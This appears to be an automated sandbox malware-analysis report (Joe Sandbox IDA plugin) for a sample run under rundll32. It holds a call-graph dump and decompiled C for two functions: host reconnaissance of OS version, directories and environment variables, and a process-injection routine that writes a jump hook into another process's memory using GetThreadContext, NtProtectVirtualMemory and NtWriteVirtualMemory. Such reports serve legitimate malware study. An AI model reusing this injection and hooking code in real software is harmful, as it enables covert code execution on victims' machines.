calls 12890 495133d 12888->12890 12891 494c08e 2 API calls 12889->12891 12893 494913b 2 API calls 12890->12893 12892 49512d9 12891->12892 12894 494c3af 2 API calls 12892->12894 12901 4951310 12893->12901 12895 49512ea 12894->12895 12896 4949d66 2 API calls 12895->12896 12897 49512fd 12896->12897 12902 494ae5c 12897->12902 12900 494913b 2 API calls 12900->12901 12901->12802 12914 494ae2d 12902->12914 12906 494911f RtlAllocateHeap 12905->12906 12907 494cc13 12906->12907 12913 494cc1d 12907->12913 12917 4949644 12907->12917 12912 494913b 2 API calls 12912->12913 12913->12888 12915 494ae47 6 API calls 12914->12915 12916 494ae43 12915->12916 12916->12900 12918 49495b3 2 API calls 12917->12918 12919 494965b 12918->12919 12920 49502f7 12919->12920 12921 4950308 12920->12921 12924 495011b 12921->12924 12925 4950135 12924->12925 12927 494cc46 12924->12927 12926 49490ea RtlAllocateHeap GetNumberFormatA 12925->12926 12925->12927 12928 4950180 12926->12928 12927->12912 12929 494911f RtlAllocateHeap 12928->12929 12930 49501cc 12929->12930 12931 49501d5 12930->12931 12932 49501e7 12930->12932 12933 4949d66 HeapFree memset 12931->12933 12934 49490ea RtlAllocateHeap GetNumberFormatA 12932->12934 12933->12927 12935 49501f1 12934->12935 12936 494c08e memset _vsnwprintf 12935->12936 12937 495020b 12936->12937 12938 494c08e memset _vsnwprintf 12937->12938 12946 4950251 12937->12946 12939 4950230 12938->12939 12944 494c3af memset GetExitCodeProcess 12939->12944 12940 494913b HeapFree memset 12941 4950277 12940->12941 12942 4949d66 HeapFree memset 12941->12942 12943 4950280 12942->12943 12945 4949d66 HeapFree memset 12943->12945 12944->12946 12945->12927 12946->12940 12950 494e465 12947->12950 12948 494e469 12948->12697 12948->12699 12949 494911f RtlAllocateHeap 12949->12950 12950->12948 12950->12949 12952 494911f RtlAllocateHeap 12951->12952 12953 494ccaa 12952->12953 12954 494911f RtlAllocateHeap 12953->12954 12959 494ce1b 12953->12959 12961 494ccc4 12954->12961 12955 494cd2a 12956 
494913b 2 API calls 12955->12956 12957 494ce0d 12956->12957 12958 494913b 2 API calls 12957->12958 12958->12959 12959->12253 12960 49492a2 memset 12960->12961 12961->12955 12961->12959 12961->12960 12962 494a087 11 API calls 12961->12962 12962->12961 12972 494ad72 12963->12972 12967 494b1d9 12966->12967 12968 494a9c7 RtlAllocateHeap 12967->12968 12970 494b201 12968->12970 12969 494b266 12969->12266 12970->12969 12971 494913b 2 API calls 12970->12971 12971->12969 12973 494af17 4 API calls 12972->12973 12974 494ad91 12973->12974 12975 494ad6f 12974->12975 12976 494913b 2 API calls 12974->12976 12975->12255 12975->12258 12976->12975 12978 494ad63 4 API calls 12977->12978 12979 494225c 12978->12979 12980 4942267 12979->12980 12981 494278b 3 API calls 12979->12981 13018 494118f 12980->13018 13019 494f5c9 12980->13019 12981->12980 12984 494ae5c 6 API calls 12985 4942282 12984->12985 13024 494edcf 12985->13024 12988 494bfab 7 API calls 12989 49422a0 12988->12989 12989->13018 13031 494ea26 12989->13031 12993 49422d9 12994 4942313 12993->12994 12996 4949491 8 API calls 12993->12996 13049 494363a CreateMutexW 12994->13049 12998 49422fb 12996->12998 12998->12994 13001 494eb23 6 API calls 12998->13001 12999 494eb23 6 API calls 13000 4942328 12999->13000 13064 4942ead 13000->13064 13001->12994 13009 494233e 13010 494c2d1 GetSystemTimeAsFileTime 13009->13010 13012 494236c 13009->13012 13105 4942ee8 13009->13105 13010->13009 13114 4944f36 13012->13114 13018->11846 13020 494c2d1 GetSystemTimeAsFileTime 13019->13020 13021 494f5d4 13020->13021 13022 494ae2d 6 API calls 13021->13022 13023 4942270 13022->13023 13023->12984 13025 4949491 8 API calls 13024->13025 13026 494ede1 13025->13026 13027 4949491 8 API calls 13026->13027 13028 494edfa 13027->13028 13130 494ed5b 13028->13130 13030 4942289 13030->12988 13032 494ea37 13031->13032 13033 49422cb 13032->13033 13034 494911f RtlAllocateHeap 13032->13034 13035 494eb23 13033->13035 13034->13033 13037 494eb41 13035->13037 13036 494eb99 
13038 494911f RtlAllocateHeap 13036->13038 13039 494ebaa 13036->13039 13037->13036 13045 494eb45 13037->13045 13143 494ea79 13037->13143 13038->13039 13040 494e83c 2 API calls 13039->13040 13039->13045 13042 494ec0f 13040->13042 13043 494ec85 SetThreadPriority 13042->13043 13044 494ec4a 13042->13044 13043->13045 13046 494ec6e 13044->13046 13047 494913b 2 API calls 13044->13047 13045->12993 13048 49492a2 memset 13046->13048 13047->13046 13048->13045 13050 4943653 CreateMutexW 13049->13050 13063 494231a 13049->13063 13051 4943665 13050->13051 13050->13063 13052 49416d2 2 API calls 13051->13052 13053 494366f 13052->13053 13054 4949743 RtlAllocateHeap 13053->13054 13053->13063 13055 494367d 13054->13055 13056 4949d4c 2 API calls 13055->13056 13057 494368b 13056->13057 13058 494911f RtlAllocateHeap 13057->13058 13059 4943695 13058->13059 13060 494911f RtlAllocateHeap 13059->13060 13059->13063 13061 49436b8 13060->13061 13061->13063 13149 4947965 13061->13149 13063->12999 13065 4942ebb 13064->13065 13067 494232f 13064->13067 13153 494dd41 13065->13153 13068 4945a69 13067->13068 13069 494e348 8 API calls 13068->13069 13070 4945a84 13069->13070 13071 4942334 13070->13071 13072 494911f RtlAllocateHeap 13070->13072 13081 49430de 13071->13081 13073 4945aa1 13072->13073 13074 4945aab 13073->13074 13160 494e0bc 13073->13160 13076 494913b 2 API calls 13074->13076 13076->13071 13080 494eb23 6 API calls 13080->13074 13082 494ad63 4 API calls 13081->13082 13083 49430fc 13082->13083 13173 4943028 13083->13173 13086 4943028 3 API calls 13087 4943126 13086->13087 13177 494adaf 13087->13177 13090 4942339 13098 4944dae 13090->13098 13091 49499fd RtlAllocateHeap 13092 4943149 13091->13092 13093 4943165 13092->13093 13180 4943181 13092->13180 13095 4949af6 2 API calls 13093->13095 13096 4943170 13095->13096 13097 494913b 2 API calls 13096->13097 13097->13090 13187 4945359 13098->13187 13100 4944dd1 13101 4944ddc 13100->13101 13102 4944e3e 13100->13102 13207 4944972 13100->13207 
13101->13009 13248 49448a6 13102->13248 13106 4943023 13105->13106 13113 4942f1d 13105->13113 13106->13009 13107 494301a 13107->13106 13293 4943218 13107->13293 13111 494911f RtlAllocateHeap 13111->13113 13112 494913b 2 API calls 13112->13113 13113->13106 13113->13107 13113->13111 13113->13112 13284 494b26f 13113->13284 13289 4945e15 13113->13289 13115 4944f44 13114->13115 13116 4944f72 13115->13116 13314 4944e50 13115->13314 13117 494913b 2 API calls 13116->13117 13119 4942371 13117->13119 13120 494ed13 13119->13120 13121 494ed19 13120->13121 13123 494ed37 13121->13123 13328 494ecbf 13121->13328 13124 494913b 2 API calls 13123->13124 13125 4942376 13124->13125 13126 4945dda 13125->13126 13127 4945de3 13126->13127 13128 4945e08 13127->13128 13129 494913b 2 API calls 13127->13129 13128->13018 13129->13128 13131 494eda5 13130->13131 13132 494ed69 13130->13132 13134 49490ca 2 API calls 13131->13134 13133 494911f RtlAllocateHeap 13132->13133 13135 494ed7a 13133->13135 13136 494edaf 13134->13136 13139 494edc8 13135->13139 13141 494913b 2 API calls 13135->13141 13137 4949743 RtlAllocateHeap 13136->13137 13138 494edba 13137->13138 13140 4949d4c 2 API calls 13138->13140 13139->13030 13140->13139 13142 494ed9e 13141->13142 13142->13030 13144 494ea83 13143->13144 13145 494eaa8 13144->13145 13146 494913b 2 API calls 13144->13146 13147 494eabe 13144->13147 13148 49492a2 memset 13145->13148 13146->13145 13147->13037 13148->13147 13150 494796a 13149->13150 13151 4949491 8 API calls 13150->13151 13152 494797c 13151->13152 13152->13063 13154 494dd58 13153->13154 13155 494dd77 13154->13155 13156 49490ea 2 API calls 13154->13156 13155->13067 13157 494dd86 lstrcmpiW 13156->13157 13158 494dd9c 13157->13158 13159 4949d66 2 API calls 13158->13159 13159->13155 13168 494df31 13160->13168 13163 494de9b 13164 49490ea 2 API calls 13163->13164 13166 494dec1 13164->13166 13165 4949d66 2 API calls 13167 4945b05 13165->13167 13166->13165 13167->13080 13169 49492a2 memset 13168->13169 13170 
494df68 13169->13170 13171 4945ab7 13170->13171 13172 494e022 LocalAlloc 13170->13172 13171->13074 13171->13163 13172->13171 13174 4943032 13173->13174 13175 4943049 13173->13175 13176 49491b9 3 API calls 13174->13176 13175->13086 13176->13175 13184 494adb9 13177->13184 13181 494318d 13180->13181 13182 4943198 atol 13181->13182 13183 4943193 13181->13183 13182->13183 13183->13092 13185 494af17 4 API calls 13184->13185 13186 4943131 13185->13186 13186->13090 13186->13091 13188 494537b 13187->13188 13254 4944811 13188->13254 13191 494f8c4 4 API calls 13192 49453a6 13191->13192 13193 494f9e7 3 API calls 13192->13193 13196 49453b1 13192->13196 13194 49453cd 13193->13194 13194->13196 13197 494911f RtlAllocateHeap 13194->13197 13195 49455b1 13199 494913b 2 API calls 13195->13199 13196->13195 13198 494fc17 6 API calls 13196->13198 13204 494541b 13197->13204 13198->13195 13200 49455bc 13199->13200 13200->13100 13201 4945570 13201->13196 13203 494913b 2 API calls 13201->13203 13202 49499fd RtlAllocateHeap 13202->13204 13203->13196 13204->13196 13204->13201 13204->13202 13205 494918a RtlAllocateHeap 13204->13205 13206 4949af6 HeapFree memset 13204->13206 13205->13204 13206->13204 13208 494498c 13207->13208 13260 49504b8 13208->13260 13211 49449cf 13213 494911f RtlAllocateHeap 13211->13213 13212 4944a79 13214 494a543 4 API calls 13212->13214 13215 49449d6 13213->13215 13216 4944a91 13214->13216 13217 4944a05 13215->13217 13218 49449e0 13215->13218 13219 4944abc 13216->13219 13220 4944a9a 13216->13220 13224 4944a50 13217->13224 13234 4944a6e 13217->13234 13222 494913b 2 API calls 13218->13222 13221 494ad63 4 API calls 13219->13221 13223 494913b 2 API calls 13220->13223 13228 4944ad1 13221->13228 13240 49449a6 13222->13240 13223->13240 13225 494913b 2 API calls 13224->13225 13225->13240 13226 4944cb9 13227 494913b 2 API calls 13226->13227 13230 4944cc9 13227->13230 13231 49492a2 memset 13228->13231 13243 4944b76 13228->13243 13229 494913b 2 API calls 13229->13243 13232 4944cf6 
13230->13232 13233 4944cd1 13230->13233 13246 4944b3a 13231->13246 13236 494913b 2 API calls 13232->13236 13237 494913b 2 API calls 13233->13237 13235 49491b9 3 API calls 13234->13235 13234->13240 13235->13240 13236->13234 13237->13240 13238 494e15a 6 API calls 13238->13246 13239 494ca94 2 API calls 13239->13246 13240->13100 13241 494ca0f 4 API calls 13241->13246 13242 494a823 22 API calls 13242->13246 13243->13226 13243->13229 13244 494a952 10 API calls 13244->13246 13246->13238 13246->13239 13246->13241 13246->13242 13246->13243 13246->13244 13247 494ae5c 6 API calls 13246->13247 13266 494490b 13246->13266 13247->13246 13249 49448b7 13248->13249 13250 49448f8 13249->13250 13252 494913b 2 API calls 13249->13252 13251 494913b 2 API calls 13250->13251 13253 4944907 13251->13253 13252->13249 13253->13101 13255 494483b 13254->13255 13256 4949644 2 API calls 13255->13256 13257 494486f 13256->13257 13258 4949924 2 API calls 13257->13258 13259 494489b 13258->13259 13259->13191 13261 49504ce 13260->13261 13262 494911f RtlAllocateHeap 13261->13262 13264 49504d9 13262->13264 13263 494499d 13263->13211 13263->13212 13263->13240 13264->13263 13265 4950568 memcpy 13264->13265 13265->13264 13273 49497be 13266->13273 13270 4944941 13271 494913b 2 API calls 13270->13271 13272 4944953 13271->13272 13272->13246 13274 4944929 GetProcessId 13273->13274 13275 49497c7 13273->13275 13279 494bffc 13274->13279 13276 494911f RtlAllocateHeap 13275->13276 13277 49497d8 13276->13277 13277->13274 13278 49497df WideCharToMultiByte 13277->13278 13278->13274 13280 494c04f 2 API calls 13279->13280 13281 494c022 13280->13281 13282 494c02e CharUpperBuffA 13281->13282 13283 494c04c 13282->13283 13283->13270 13303 494ad14 13284->13303 13287 494c2d1 GetSystemTimeAsFileTime 13288 494b297 13287->13288 13288->13113 13290 4945e2c 13289->13290 13291 4945e55 13289->13291 13290->13291 13292 494eb23 6 API calls 13290->13292 13291->13113 13292->13291 13294 494911f RtlAllocateHeap 13293->13294 13295 4943233 
13294->13295 13296 49432af 13295->13296 13299 4943265 lstrcatA 13295->13299 13301 494c04f 2 API calls 13295->13301 13302 494323d 13295->13302 13311 494ae88 13296->13311 13299->13295 13300 494913b 2 API calls 13300->13302 13301->13295 13302->13106 13306 494ad1e 13303->13306 13307 494af17 4 API calls 13306->13307 13308 494ad3f 13307->13308 13309 494ad1c 13308->13309 13310 494913b 2 API calls 13308->13310 13309->13287 13309->13288 13310->13309 13312 494ae9a 6 API calls 13311->13312 13313 49432b9 13312->13313 13313->13300 13319 494438c 13314->13319 13316 4944e71 13316->13115 13317 4944e67 13317->13316 13318 494913b 2 API calls 13317->13318 13318->13316 13320 494911f RtlAllocateHeap 13319->13320 13321 4944398 13320->13321 13322 49443a2 13321->13322 13323 49416d2 2 API calls 13321->13323 13322->13317 13324 49443b0 13323->13324 13325 494c04f 2 API calls 13324->13325 13326 49443c6 13325->13326 13327 4949d4c 2 API calls 13326->13327 13327->13322 13329 494ed0e 13328->13329 13331 494ecc7 13328->13331 13329->13121 13330 494ecd6 13330->13121 13331->13330 13332 494ea79 2 API calls 13331->13332 13333 494ed0a 13332->13333 13333->13121

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 77%
                                                                      			E0494BB4D(void* __edx, void* __fp0) {
                                                                      				char _v8;
                                                                      				char _v12;
                                                                      				char _v16;
                                                                      				char _v144;
                                                                      				char _v656;
                                                                      				char _v668;
                                                                      				char _v2644;
                                                                      				void* __esi;
                                                                      				struct _OSVERSIONINFOA* _t70;
                                                                      				intOrPtr _t72;
                                                                      				void* _t73;
                                                                      				intOrPtr _t75;
                                                                      				intOrPtr _t77;
                                                                      				intOrPtr* _t79;
                                                                      				intOrPtr _t81;
                                                                      				intOrPtr _t82;
                                                                      				intOrPtr _t83;
                                                                      				intOrPtr _t89;
                                                                      				intOrPtr _t91;
                                                                      				void* _t92;
                                                                      				intOrPtr _t94;
                                                                      				intOrPtr _t95;
                                                                      				void* _t96;
                                                                      				void* _t100;
                                                                      				intOrPtr _t102;
                                                                      				intOrPtr _t104;
                                                                      				short _t109;
                                                                      				char _t111;
                                                                      				intOrPtr _t116;
                                                                      				intOrPtr _t119;
                                                                      				intOrPtr _t122;
                                                                      				intOrPtr _t126;
                                                                      				intOrPtr _t137;
                                                                      				intOrPtr _t139;
                                                                      				intOrPtr _t141;
                                                                      				intOrPtr _t144;
                                                                      				intOrPtr _t146;
                                                                      				intOrPtr _t152;
                                                                      				void* _t153;
                                                                      				WCHAR* _t154;
                                                                      				char* _t155;
                                                                      				intOrPtr _t166;
                                                                      				intOrPtr _t182;
                                                                      				void* _t198;
                                                                      				struct _OSVERSIONINFOA* _t199;
                                                                      				void* _t200;
                                                                      				void* _t202;
                                                                      				char _t205;
                                                                      				void* _t206;
                                                                      				char* _t207;
                                                                      				void* _t210;
                                                                      				int* _t211;
                                                                      				void* _t224;
                                                                      
                                                                      				_t224 = __fp0;
                                                                      				_t152 =  *0x4960fa8; // 0x4940000
                                                                      				_t70 = E0494911F(0x1ac4);
                                                                      				_t199 = _t70;
                                                                      				if(_t199 != 0) {
                                                                      					 *((intOrPtr*)(_t199 + 0x1640)) = GetCurrentProcessId();
                                                                      					_t72 =  *0x4960fa0; // 0x49ff8a0
                                                                      					_t73 =  *((intOrPtr*)(_t72 + 0xb0))(_t200);
                                                                      					_t3 = _t199 + 0x648; // 0x648
                                                                      					E04954A2A( *((intOrPtr*)(_t199 + 0x1640)) + _t73, _t3);
                                                                      					_t75 =  *0x4960fa0; // 0x49ff8a0
                                                                      					_t5 = _t199 + 0x1644; // 0x1644
                                                                      					_t201 = _t5;
                                                                      					_push(0x105);
                                                                      					_push(_t5);
                                                                      					_push(0);
                                                                      					if( *((intOrPtr*)(_t75 + 0x12c))() != 0) {
                                                                      						 *((intOrPtr*)(_t199 + 0x1854)) = E04949547(_t201);
                                                                      					}
                                                                      					_t77 =  *0x4960fa0; // 0x49ff8a0
                                                                      					_t79 = E0494DC33( *((intOrPtr*)(_t77 + 0x130))()); // executed
                                                                      					 *((intOrPtr*)(_t199 + 0x110)) = _t79;
                                                                      					_t163 =  *_t79;
                                                                      					if(E0494DDAE( *_t79) == 0) {
                                                                      						_t81 = E0494DC83(_t163, _t201); // executed
                                                                      						__eflags = _t81;
                                                                      						_t166 = (0 | _t81 > 0x00000000) + 1;
                                                                      						__eflags = _t166;
                                                                      						 *((intOrPtr*)(_t199 + 0x214)) = _t166;
                                                                      					} else {
                                                                      						 *((intOrPtr*)(_t199 + 0x214)) = 3;
                                                                      					}
                                                                      					_t14 = _t199 + 0x220; // 0x220, executed
                                                                      					_t82 = E0494E5A6(_t14); // executed
                                                                      					 *((intOrPtr*)(_t199 + 0x218)) = _t82;
                                                                      					_t83 = E0494E56B(_t14); // executed
                                                                      					 *((intOrPtr*)(_t199 + 0x21c)) = _t83;
                                                                      					_t17 = _t199 + 0x114; // 0x114
                                                                      					_t202 = _t17;
                                                                      					 *((intOrPtr*)(_t199 + 0x224)) = _t152;
                                                                      					_push( &_v16);
                                                                      					_v12 = 0x80;
                                                                      					_push( &_v8);
                                                                      					_v8 = 0x100;
                                                                      					_push( &_v656);
                                                                      					_push( &_v12);
                                                                      					_push(_t202);
                                                                      					_push( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x110)))));
                                                                      					_t89 =  *0x4960fc8; // 0x49ffb00
                                                                      					_push(0); // executed
                                                                      					if( *((intOrPtr*)(_t89 + 0x6c))() == 0) {
                                                                      						GetLastError();
                                                                      					}
                                                                      					_t91 =  *0x4960fc0; // 0x49ffa38
                                                                      					_t92 =  *((intOrPtr*)(_t91 + 0x3c))(0x1000);
                                                                      					_t28 = _t199 + 0x228; // 0x228
                                                                      					_t153 = _t28;
                                                                      					 *(_t199 + 0x1850) = 0 | _t92 > 0x00000000;
                                                                      					if( *0x4960fa4 != 2) {
                                                                      						E0494BA56( *((intOrPtr*)(_t199 + 0x224)), _t153);
                                                                      					} else {
                                                                      						E0494BB20(_t153);
                                                                      					}
                                                                      					_t94 =  *0x4960fa4; // 0x1
                                                                      					 *((intOrPtr*)(_t199 + 0xa0)) = _t94;
                                                                      					_t219 = _t153;
                                                                      					if(_t153 != 0) {
                                                                      						 *((intOrPtr*)(_t199 + 0x434)) = E04949547(_t153);
                                                                      					}
                                                                      					_t95 = E0494D130();
                                                                      					_t35 = _t199 + 0xb0; // 0xb0
                                                                      					_t203 = _t35;
                                                                      					 *((intOrPtr*)(_t199 + 0xac)) = _t95;
                                                                      					_t96 = E0494CF1D(_t35, _t219, _t224);
                                                                      					_t37 = _t199 + 0xd0; // 0xd0
                                                                      					E049498A9(_t96, _t35, _t37);
                                                                      					_t38 = _t199 + 0x438; // 0x438
                                                                      					E0494955E(_t153, _t38);
                                                                      					_t100 = E0494E605(_t203, E0494CE25(_t35), 0);
                                                                      					_t39 = _t199 + 0x100c; // 0x100c
                                                                      					E0494D146(_t100, _t39, _t224);
                                                                      					_t102 =  *0x4960fa0; // 0x49ff8a0
                                                                      					_t104 = E0494DE00( *((intOrPtr*)(_t102 + 0x130))(_t202)); // executed
                                                                      					 *((intOrPtr*)(_t199 + 0x101c)) = _t104;
                                                                      					E049492A2(_t199, 0, 0x9c);
                                                                      					_t211 = _t210 + 0xc;
                                                                      					_t199->dwOSVersionInfoSize = 0x9c;
                                                                      					GetVersionExA(_t199);
                                                                      					 *((intOrPtr*)(_t199 + 0xa8)) = E0494B85A(_t103);
                                                                      					_t109 = E0494B883(_t108);
                                                                      					_t43 = _t199 + 0x1020; // 0x1020
                                                                      					_t154 = _t43;
                                                                      					 *((short*)(_t199 + 0x9c)) = _t109;
                                                                      					GetWindowsDirectoryW(_t154, 0x104);
                                                                      					_t111 = E049490EA(_t108, 0x83);
                                                                      					_t182 =  *0x4960fa0; // 0x49ff8a0
                                                                      					_t205 = _t111;
                                                                      					 *_t211 = 0x104;
                                                                      					_push( &_v668);
                                                                      					_push(_t205);
                                                                      					_v8 = _t205;
                                                                      					if( *((intOrPtr*)(_t182 + 0xf0))() == 0) {
                                                                      						_t146 =  *0x4960fa0; // 0x49ff8a0
                                                                      						 *((intOrPtr*)(_t146 + 0x10c))(_t205, _t154);
                                                                      					}
                                                                      					E04949D66( &_v8);
                                                                      					_t116 =  *0x4960fa0; // 0x49ff8a0
                                                                      					_t50 = _t199 + 0x1434; // 0x1434
                                                                      					_t206 = _t50;
                                                                      					 *_t211 = 0x209;
                                                                      					_push(_t206);
                                                                      					_push(L"USERPROFILE");
                                                                      					if( *((intOrPtr*)(_t116 + 0xf0))() == 0) {
                                                                      						E0494C08E(_t206, 0x105, L"%s\\%s", _t154);
                                                                      						_t144 =  *0x4960fa0; // 0x49ff8a0
                                                                      						_t211 =  &(_t211[5]);
                                                                      						 *((intOrPtr*)(_t144 + 0x10c))(L"USERPROFILE", _t206, "TEMP");
                                                                      					}
                                                                      					_push(0x20a);
                                                                      					_t53 = _t199 + 0x122a; // 0x122a
                                                                      					_t155 = L"TEMP";
                                                                      					_t119 =  *0x4960fa0; // 0x49ff8a0
                                                                      					_push(_t155);
                                                                      					if( *((intOrPtr*)(_t119 + 0xf0))() == 0) {
                                                                      						_t141 =  *0x4960fa0; // 0x49ff8a0
                                                                      						 *((intOrPtr*)(_t141 + 0x10c))(_t155, _t206);
                                                                      					}
                                                                      					_push(0x40);
                                                                      					_t207 = L"SystemDrive";
                                                                      					_push( &_v144);
                                                                      					_t122 =  *0x4960fa0; // 0x49ff8a0
                                                                      					_push(_t207);
                                                                      					if( *((intOrPtr*)(_t122 + 0xf0))() == 0) {
                                                                      						_t139 =  *0x4960fa0; // 0x49ff8a0
                                                                      						 *((intOrPtr*)(_t139 + 0x10c))(_t207, L"C:");
                                                                      					}
                                                                      					_v8 = 0x7f;
                                                                      					_t61 = _t199 + 0x199c; // 0x199c
                                                                      					_t126 =  *0x4960fa0; // 0x49ff8a0
                                                                      					 *((intOrPtr*)(_t126 + 0xc0))(_t61,  &_v8);
                                                                      					_t64 = _t199 + 0x100c; // 0x100c
                                                                      					E04954A2A(E0494E605(_t64, E0494CE25(_t64), 0),  &_v2644);
                                                                      					_t65 = _t199 + 0x1858; // 0x1858
                                                                      					E049549FC( &_v2644, _t65, 0x20);
                                                                      					_push( &_v2644);
                                                                      					_push(0x1e);
                                                                      					_t68 = _t199 + 0x1878; // 0x1878
                                                                      					_t198 = 0x14;
                                                                      					E0494962B(_t68, _t198);
                                                                      					_t137 = E0494B501(_t68, _t198); // executed
                                                                      					 *((intOrPtr*)(_t199 + 0x1898)) = _t137;
                                                                      					return _t199;
                                                                      				}
                                                                      				return _t70;
                                                                      			}

























































                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0494BB74
                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 0494BC6E
                                                                      • GetVersionExA.KERNEL32(00000000,?,?,00000000), ref: 0494BD56
                                                                        • Part of subcall function 0494DC83: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04940000), ref: 0494DD27
                                                                      • GetWindowsDirectoryW.KERNEL32(00001020,00000104,?,?,00000000), ref: 0494BD81
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseCurrentDirectoryErrorFindLastNotificationProcessVersionWindows
                                                                      • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                      • API String ID: 3040727122-2706916422
                                                                      • Opcode ID: 0eb316aabf8ec5168b62c8d731872c87397ccb2c46a4bb53f33828bab8d0034a
                                                                      • Instruction ID: 60926ce8ac20a75d5df65747f49dbe862098162f9e61489d83e176938409faad
                                                                      • Opcode Fuzzy Hash: 0eb316aabf8ec5168b62c8d731872c87397ccb2c46a4bb53f33828bab8d0034a
                                                                      • Instruction Fuzzy Hash: 8BA14C71741605EFE704EF74D888FEABBA8FF89304F104279E51997241EB74BA058B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 144 494a823-494a842 145 494a844-494a84e call 494a222 144->145 146 494a850 144->146 147 494a855-494a857 145->147 146->147 149 494a863-494a871 call 494a412 147->149 150 494a859-494a85e 147->150 154 494a877-494a8ae call 49492a2 GetThreadContext 149->154 155 494a923-494a928 call 494a356 149->155 150->149 154->155 161 494a8b0-494a8c5 154->161 160 494a92a-494a92e 155->160 162 494a8d7-494a8db 161->162 163 494a8c7-494a8d5 161->163 165 494a8dd-494a8e2 162->165 166 494a94e-494a950 162->166 164 494a8e3-494a91f NtProtectVirtualMemory NtWriteVirtualMemory 163->164 167 494a921 164->167 168 494a92f-494a94c NtProtectVirtualMemory 164->168 165->164 166->160 167->155 168->155
                                                                      C-Code - Quality: 100%
                                                                      			E0494A823(void* __ecx, void** __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                      				long _v8;
                                                                      				intOrPtr _v15;
                                                                      				void _v16;
                                                                      				long _v20;
                                                                      				void* _v24;
                                                                      				long _v28;
                                                                      				void* _v32;
                                                                      				struct _CONTEXT _v748;
                                                                      				intOrPtr _t37;
                                                                      				intOrPtr _t38;
                                                                      				void* _t39;
                                                                      				void* _t41;
                                                                      				void _t49;
                                                                      				intOrPtr _t66;
                                                                      				void* _t68;
                                                                      				long _t70;
                                                                      				void* _t73;
                                                                      				void** _t77;
                                                                      				void* _t80;
                                                                      
                                                                      				_t37 =  *0x4960fd8; // 0x49ffc50
                                                                      				_t77 = __edx;
                                                                      				_t68 = __ecx;
                                                                      				if(( *(_t37 + 0x1898) & 0x00fe0286) == 0) {
                                                                      					_t38 =  *0x49610b0;
                                                                      				} else {
                                                                      					_t38 = E0494A222(__ecx, __edx);
                                                                      					 *0x49610b0 = _t38;
                                                                      				}
                                                                      				if(_t38 == 0) {
                                                                      					_t66 =  *0x4960fe4; // 0x49ff9f0
                                                                      					 *0x49610b0 = _t66;
                                                                      				}
                                                                      				_t39 = E0494A412( *_t77, _a4); // executed
                                                                      				_t80 = _t39;
                                                                      				if(_t80 == 0) {
                                                                      					L13:
                                                                      					E0494A356();
                                                                      					_t41 = _t80;
                                                                      					goto L14;
                                                                      				} else {
                                                                      					E049492A2( &_v748, 0, 0x2cc);
                                                                      					_v748.ContextFlags = 0x10002;
                                                                      					if(GetThreadContext(_t77[1],  &_v748) == 0) {
                                                                      						goto L13;
                                                                      					}
                                                                      					_v20 = _v20 & 0x00000000;
                                                                      					_t73 = _v748.Eax;
                                                                      					_t49 = _t80 - _a4 + _t68;
                                                                      					if(_a8 != 1) {
                                                                      						if(_a8 != 2) {
                                                                      							_t41 = 0;
                                                                      							L14:
                                                                      							return _t41;
                                                                      						}
                                                                      						_v16 = _t49;
                                                                      						_t70 = 8;
                                                                      						L11:
                                                                      						_v32 = _t73;
                                                                      						_v24 = _t73;
                                                                      						_v8 = _t70;
                                                                      						NtProtectVirtualMemory( *_t77,  &_v24,  &_v8, 4,  &_v20);
                                                                      						if(NtWriteVirtualMemory( *_t77, _v748.Eax,  &_v16, _t70,  &_v8) >= 0) {
                                                                      							_v28 = _v28 & 0x00000000;
                                                                      							NtProtectVirtualMemory( *_t77,  &_v32,  &_v8, _v20,  &_v28);
                                                                      						} else {
                                                                      							_t80 = 0;
                                                                      						}
                                                                      						goto L13;
                                                                      					}
                                                                      					_v16 = 0xe9;
                                                                      					_t70 = 5;
                                                                      					_v15 = _t49 - _t73 - _t70;
                                                                      					goto L11;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • GetThreadContext.KERNELBASE(?,00010002), ref: 0494A8A6
                                                                      • NtProtectVirtualMemory.NTDLL(?,?,00000001,00000004,00000000), ref: 0494A901
                                                                      • NtWriteVirtualMemory.NTDLL(?,?,00000002,00000008,00000001), ref: 0494A91A
                                                                        • Part of subcall function 0494A222: LoadLibraryW.KERNEL32(00000000), ref: 0494A2F2
                                                                      • NtProtectVirtualMemory.NTDLL(?,?,00000001,00000000,00000000), ref: 0494A949
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryVirtual$Protect$ContextLibraryLoadThreadWrite
                                                                      • String ID:
                                                                      • API String ID: 2853935321-0
                                                                      • Opcode ID: 995d246d4799b7bc36d15e70902fcae852dfd750e6bdff3d776462bd15d49d94
                                                                      • Instruction ID: 96f4206da6907025d766265045298d4660b976efa831671f489dfb85f461a3ef
